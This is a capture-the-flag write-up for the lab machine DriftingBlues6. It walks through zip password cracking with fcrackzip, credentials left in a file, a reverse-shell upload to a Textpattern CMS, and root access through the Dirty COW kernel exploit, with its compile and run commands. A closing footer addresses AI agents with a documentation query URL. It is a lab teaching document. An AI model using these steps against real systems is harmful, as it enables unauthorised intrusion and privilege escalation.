# Proving grounds Play: DriftingBlues6

Proving grounds Play - DriftingBlues6 CTF writeup.

### Nmap

```sh
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-title: driftingblues
|_http-server-header: Apache/2.2.22 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/textpattern/textpattern
```

### Web PORT: 80

![img](/files/JO83tT5d8JIKVGPaDAZc)

### Fuzzing for files

/robots.txt

**Robots File**

```
User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute
;)
```

#### Login

<http://192.168.151.219/textpattern/textpattern/>

![img](/files/fwr32Qkl4Tp8dd7ka61z)

Zip file found at `http://192.168.151.219/spammer.zip`. File is password protected and which can be easliy cracked using `fcrackzip` tool.

```sh
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt spammer.zip
```

Extracted password: `myspace4`

Extracted `creds.txt` has login credentials for the CMS application.

```
mayer:lionheart
```

Login to the application and upload reverse shell.

![img](/files/hN0AC2p6act26lnTMtVv)

Checked the document root configuration and triggered the reverse shell file.

**Initial foothold obtained**

![img](/files/uZ050msaHcFQUAId640b)

### Privilege Escalation

Check the kernel version to escalate privileges.

```sh
uname -a
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
```

Linux kernel <3.2.0-4-amd64 is vulnerable to [Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE\_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)](https://www.exploit-db.com/exploits/40839).

Download the exploit into the attacking machine and compile the code as mentioned in the exploit.

Run the exploit as follow:

```sh
gcc -pthread dirty.c -o dirty -lcrypt
./dirty password #password is the password for the user firefart created by the exploit
```

Switch user to `firefart` and use the password `password`.

![img](/files/foGjncMrDpHaaEoHbWcL)

**Root shell obtained**

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://thevillagehacker-security.gitbook.io/ctf-writeups/writeups/2023-09-10-proving_grounds_play-driftingblues6.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.